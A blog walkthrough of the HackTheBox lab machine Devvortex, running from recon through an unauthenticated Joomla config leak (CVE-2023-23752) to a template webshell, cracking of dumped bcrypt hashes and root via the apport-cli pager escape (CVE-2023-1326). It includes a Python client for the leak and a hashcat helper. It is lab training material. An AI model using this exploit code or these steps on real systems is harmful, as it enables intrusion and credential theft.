Holiday box practice #4: Devvortex

HTB, go!

Box: https://app.hackthebox.com/machines/Devvortex

user flag

nmap first:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 10:02 CST
Nmap scan report for 10.10.11.242 (10.10.11.242)
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.67 seconds

A Linux box with SSH on 22 and nginx on 80. nmap notes that port 80 redirects to http://devvortex.htb/, so that name has to go into /etc/hosts before the site loads; once it does, it's a static site with nothing of interest.

dirsearch didn't turn up anything either. Bad start, stuck.

Checked a writeup: the missing step is subdomain brute-forcing. nginx picks the site by the Host header here, so fuzzing that header (e.g. ffuf with `-H 'Host: FUZZ.devvortex.htb'`, filtering out the response size of the redirect page) finds dev.devvortex.htb. Fair enough; add that to /etc/hosts as well.

dev.devvortex.htb also looks like a static site with nothing obvious, but a directory scan against it finds robots.txt:

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

The scan also finds README.txt, which shows the site is a CMS, Joomla 4.2.x (the README links the 4.2 version history). The exact patch level is in administrator/manifests/files/joomla.xml and is worth checking before choosing a CVE:

Joomla! CMS™

1- Overview
* This is a Joomla! 4.x installation/upgrade package.
* Joomla! Official site: https://www.joomla.org
* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/4.2-dev

2- What is Joomla?
* Joomla! is a Content Management System (CMS) which enables you to build websites and powerful online applications.
* It's a free and Open Source software, distributed under the GNU General Public License version 2 or later.
* This is a simple and powerful web server application and it requires a server with PHP and either MySQL, PostgreSQL or SQL Server to run.
You can find full technical requirements here: https://downloads.joomla.org/technical-requirements.

3- Is Joomla! for you?
* Joomla! is the right solution for most content web projects: https://docs.joomla.org/Special:MyLanguage/Portal:Learn_More
* See Joomla's core features - https://www.joomla.org/core-features.html
* Try out our free hosting service: https://launch.joomla.org

4- How to find a Joomla! translation?
* Repository of accredited language packs: https://downloads.joomla.org/language-packs
* You can also add languages directly to your website via your Joomla! administration panel: https://docs.joomla.org/Special:MyLanguage/J4.x:Setup_a_Multilingual_Site/Installing_New_Language
* Learn how to setup a Multilingual Joomla! Site: https://docs.joomla.org/Special:MyLanguage/J4.x:Setup_a_Multilingual_Site

5- Learn Joomla!
* Read Getting Started with Joomla to find out the basics: https://docs.joomla.org/Special:MyLanguage/J4.x:Getting_Started_with_Joomla!
* Before installing, read the beginners guide: https://docs.joomla.org/Special:MyLanguage/Portal:Beginners

6- What are the benefits of Joomla?
* The functionality of a Joomla! website can be extended by installing extensions that you can create (or download) to suit your needs.
* There are many ready-made extensions that you can download and install.
* Check out the Joomla! Extensions Directory (JED): https://extensions.joomla.org

7- Is it easy to change the layout display?
* The layout is controlled by templates that you can edit.
* There are a lot of ready-made professional templates that you can download.
* Check out the template management information: https://docs.joomla.org/Special:MyLanguage/Portal:Template_Management

8- Ready to install Joomla?
* Check the minimum requirements here: https://downloads.joomla.org/technical-requirements
* How do you install Joomla - https://docs.joomla.org/Special:MyLanguage/J4.x:Installing_Joomla
* You could start your Joomla! experience building your site on a local test server.
When ready it can be moved to an online hosting account of your choice.
See the tutorial: https://docs.joomla.org/Special:MyLanguage/Installing_Joomla_locally

9- Updates are free!
* Always use the latest version: https://downloads.joomla.org/latest

10- Where can you get support and help?
* The Joomla! Documentation: https://docs.joomla.org/Special:MyLanguage/Main_Page
* FAQ Frequently Asked Questions: https://docs.joomla.org/Special:MyLanguage/Category:FAQ
* Find the information you need: https://docs.joomla.org/Special:MyLanguage/Start_here
* Find help and other users: https://www.joomla.org/about-joomla/create-and-share.html
* Post questions at our forums: https://forum.joomla.org
* Joomla! Resources Directory (JRD): https://community.joomla.org/service-providers-directory/

11- Do you already have a Joomla! site that's not built with Joomla! 4.x ?
* What's new in Joomla! 4.x: https://www.joomla.org/4
* What are the main differences between 3.x and 4.x? https://docs.joomla.org/Special:MyLanguage/What_are_the_major_differences_between_Joomla!_3.x_and_4.x
* How to migrate from 3.x to 4.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_3.x_to_4.x_Step_by_Step_Migration
* How to migrate from 2.5.x to 3.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_2.5_to_3.x_Step_by_Step_Migration
* How to migrate from 1.5.x to 3.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_1.5_to_3.x_Step_by_Step_Migration

12- Do you want to improve Joomla?
* Where to request a feature? https://issues.joomla.org
* How do you report a bug? https://docs.joomla.org/Special:MyLanguage/Filing_bugs_and_issues
* Get Involved: Joomla! is a community developed software. Join the community at https://volunteers.joomla.org
* Documentation for Developers: https://docs.joomla.org/Special:MyLanguage/Portal:Developers
* Documentation for Web designers: https://docs.joomla.org/Special:MyLanguage/Web_designers

Copyright:
* (C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
* Distributed under the GNU General Public License version 2 or later
* See License details at https://docs.joomla.org/Special:MyLanguage/Joomla_Licenses

Searching for Joomla 4.2 vulnerabilities turns up CVE-2023-23752, an unauthenticated information disclosure in the web services API (Joomla 4.0.0 through 4.2.7, fixed in 4.2.8): `/api/index.php/v1/config/application?public=true` returns the site configuration to anyone. It doesn't give command execution:

but it does leak sensitive data: the database host, user, password, database name and table prefix.
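As an added example (my own code, not from the original post or from Joomla), here is a small client for that leak. The two API paths are the ones in the public advisory for CVE-2023-23752, the vhost name is the one from this box, and the embedded JSON response is a constructed placeholder so the parsing runs offline; it is not the real output from the target.

```python
"""
Added example (not from the original post): pull the Joomla configuration that
CVE-2023-23752 exposes and flatten it into a dict of the fields that matter.

Assumptions: endpoints as in the public advisory; the vhost is dev.devvortex.htb;
SAMPLE_RESPONSE below is CONSTRUCTED (placeholder values) for offline testing.
"""
import json
import urllib.request
from typing import Any

# Endpoints an unpatched Joomla 4.0.0-4.2.7 API serves without authentication.
CONFIG_PATH = "/api/index.php/v1/config/application?public=true"
USERS_PATH = "/api/index.php/v1/users?public=true"

# Config keys a pentester wants out of the application config, in report order.
INTERESTING = ("host", "user", "password", "db", "dbprefix", "sitename", "secret", "mailfrom")


def api_url(base: str, path: str = CONFIG_PATH) -> str:
    """Build the request URL; base is scheme://host with no trailing slash."""
    return base.rstrip("/") + path


def flatten_jsonapi(body: str) -> dict[str, Any]:
    """
    Joomla's JSON:API returns each config key as its own `data` element:
    {"data":[{"type":"application","id":"224","attributes":{"user":"x"}}, ...]}
    Merge every attributes block into one flat dict.
    """
    doc = json.loads(body)
    merged: dict[str, Any] = {}
    for item in doc.get("data", []):
        merged.update(item.get("attributes", {}))
    return merged


def leaked_secrets(body: str) -> dict[str, Any]:
    """Keep only the INTERESTING keys that are actually present, in INTERESTING order."""
    flat = flatten_jsonapi(body)
    return {k: flat[k] for k in INTERESTING if k in flat}


def fetch_config(base: str, timeout: float = 10.0) -> dict[str, Any]:
    """Live request against a target (needs network; not exercised by the offline test)."""
    req = urllib.request.Request(api_url(base), headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return leaked_secrets(resp.read().decode("utf-8", "replace"))


# CONSTRUCTED sample: JSON:API shape, placeholder values. Not the real box's response.
SAMPLE_RESPONSE = json.dumps({
    "links": {"self": "http://dev.devvortex.htb" + CONFIG_PATH},
    "data": [
        {"type": "application", "id": "224", "attributes": {"offline": False}},
        {"type": "application", "id": "224", "attributes": {"sitename": "Development"}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli"}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost"}},
        {"type": "application", "id": "224", "attributes": {"user": "dbuser"}},
        {"type": "application", "id": "224", "attributes": {"password": "placeholder-password"}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla"}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_"}},
    ],
})

if __name__ == "__main__":
    # Offline demo on the constructed sample; swap in fetch_config("http://dev.devvortex.htb") for a live target.
    for key, value in leaked_secrets(SAMPLE_RESPONSE).items():
        print(f"{key:10s} {value}")
```

The response is JSON:API and can be paginated; if a field you expect is missing, look for a `links.next` URL and merge that page too. The `dbprefix` value is what tells you later that the users table is `<prefix>users`.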

I tried the leaked password over SSH and it failed. Then remembered that robots.txt had listed /administrator/; the leaked credentials are reused for the Joomla admin panel, so log in there:

Once in the back end, a shell is easy. The usual targets are file upload points, plugin/extension installers and template editors; here the template manager in the admin panel does it:

It lets you edit the PHP of individual template files, which means code execution. Test it by replacing the contents of error.php with phpinfo():

It works, so write a webshell into the file instead and connect with AntSword (蚁剑):

That gives a shell as the web server user plus full administrator access to the site with almost no effort: the easiest episode of the series.

The shell runs as www-data, which can't read the user flag, so as usual the next step is finding an SSH password:

Log into MySQL with the leaked database credentials and look around. AntSword's command execution is not interactive, so the mysql prompt doesn't work through it; either spawn a reverse shell first or run the query non-interactively with `mysql -u <user> -p<password> <db> -e '...'`. The users table carries the site's table prefix (sd4fg_):

mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

The $2y$ hashes are bcrypt, hashcat mode 3200 (cost factor 10, so it's slow: stick to rockyou rather than anything bigger):

With the cracked password, SSH in as logan and read the user flag:
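Added example (mine, not from the post): turn the query output above into a hashcat job and pick the mode from the hash prefix instead of guessing. The table text is copied from the post; the parsing and identification logic is this example's own, and the output path is whatever you pass in.

```python
"""
Added example (not from the original post): parse a `mysql` CLI table of users/hashes,
identify the hash format (bcrypt -> hashcat -m 3200), report the bcrypt cost, and
write a user:hash file for `hashcat --username`.
"""
import re
from typing import Optional

# Copied from the post's mysql output.
MYSQL_OUTPUT = """\
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+
"""

# Modular-crypt prefixes -> hashcat mode, for the formats a PHP/Linux box is likely to use.
HASHCAT_MODES = {
    "$2a$": 3200, "$2b$": 3200, "$2x$": 3200, "$2y$": 3200,  # bcrypt
    "$1$": 500,    # md5crypt
    "$5$": 7400,   # sha256crypt
    "$6$": 1800,   # sha512crypt
}
# $2y$<cost>$<22-char salt><31-char digest>, both in bcrypt's ./A-Za-z0-9 alphabet.
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")


def parse_mysql_table(text: str) -> list[tuple[str, str]]:
    """Return (username, hash) rows, skipping the +---+ borders and the header row."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 2 or cells[0] == "username":
            continue
        rows.append((cells[0], cells[1]))
    return rows


def hashcat_mode(h: str) -> Optional[int]:
    """hashcat -m value for a hash string, or None if the prefix is unknown."""
    for prefix, mode in HASHCAT_MODES.items():
        if h.startswith(prefix):
            return mode
    return None


def bcrypt_cost(h: str) -> Optional[int]:
    """bcrypt cost factor (2**cost rounds); the bigger it is, the slower the crack."""
    m = BCRYPT_RE.match(h)
    return int(m.group(1)) if m else None


def write_hashcat_file(rows: list[tuple[str, str]], path: str) -> str:
    """Write user:hash lines to `path` and return the hashcat command line for them."""
    modes = {hashcat_mode(h) for _, h in rows}
    if len(modes) != 1 or None in modes:
        raise ValueError(f"mixed or unrecognised hash formats: {modes}")
    with open(path, "w", encoding="utf-8") as fh:
        fh.writelines(f"{user}:{h}\n" for user, h in rows)
    return f"hashcat -m {modes.pop()} --username {path} /usr/share/wordlists/rockyou.txt"


if __name__ == "__main__":
    users = parse_mysql_table(MYSQL_OUTPUT)
    for user, h in users:
        print(f"{user}: mode {hashcat_mode(h)}, bcrypt cost {bcrypt_cost(h)}")
    print(write_hashcat_file(users, "joomla.hashes"))
```

With `--username` hashcat ignores the `user:` part while cracking and shows it again with `--show`, so you don't lose track of which password belongs to which account.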

root flag

Check what sudo allows:

logan@devvortex:~$ sudo -l
[sudo] password for logan:
Sorry, try again.
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

apport-cli is Ubuntu's command-line crash reporter. Searching it with the sudo rule in mind turns up CVE-2023-1326, a privilege escalation: when apport-cli displays a report it hands the text to a pager (less by default), and an unpatched version doesn't set LESSSECURE, so less's `!` command runs a shell as whatever user apport-cli is running as, root under sudo. Patched builds export LESSSECURE=1 before starting the pager, which disables that escape. PoC: https://github.com/diego-tella/CVE-2023-1326-PoC

Create a crash file locally, serve it with a quick HTTP server, fetch it on the target, then load it with `sudo /usr/bin/apport-cli -c <file>` and choose V (View report). Once less is showing the report, `!/bin/bash` drops into a root shell:

Root:

Author: Alex
Link: http://example.com/2024/02/07/hackthebox-machine-Devvortex/
License: unless stated otherwise, all posts on this blog are under CC BY-NC-SA 4.0. Please credit Alex's blog when reposting.